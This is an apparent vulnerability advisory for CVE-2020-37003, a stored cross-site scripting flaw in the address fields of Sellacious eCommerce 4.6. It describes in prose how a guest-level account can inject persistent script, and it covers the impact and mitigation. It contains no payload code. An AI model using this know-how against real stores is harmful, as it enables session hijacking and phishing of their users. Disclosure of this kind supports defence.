CVE-2020-37003

Vulnerability

Overview

Sellacious eCommerce 4.6 contains a persistent cross-site scripting (XSS) vulnerability in the Manage Your Addresses module [1][2]. The root cause is insufficient input validation on multiple address fields, including full name, first name, middle name, last name, company, and address [1][2]. This allows attackers to inject arbitrary JavaScript code that is stored on the server and executed whenever the address information is rendered in the application's user interface [1][2].

Exploitation

An attacker can exploit this vulnerability by first registering a low-privilege user account (guest privileges) [1][2]. Using the POST request method, the attacker injects malicious script code into any of the vulnerable address input fields [2]. The injected script is then persistently stored and executed each time the address is displayed, affecting all users who view the compromised address [1][2].

Impact

Successful exploitation enables an attacker to hijack active user sessions, conduct persistent phishing attacks, redirect users to malicious external sites, and manipulate affected application modules [1][2][4]. The attack does not require high privileges, making it accessible to any registered user [1].

Mitigation

The vulnerability was publicly disclosed in May 2020 [1][2]. No official patch has been confirmed; users are advised to implement strict input validation and output encoding to prevent script injection [1][2][4].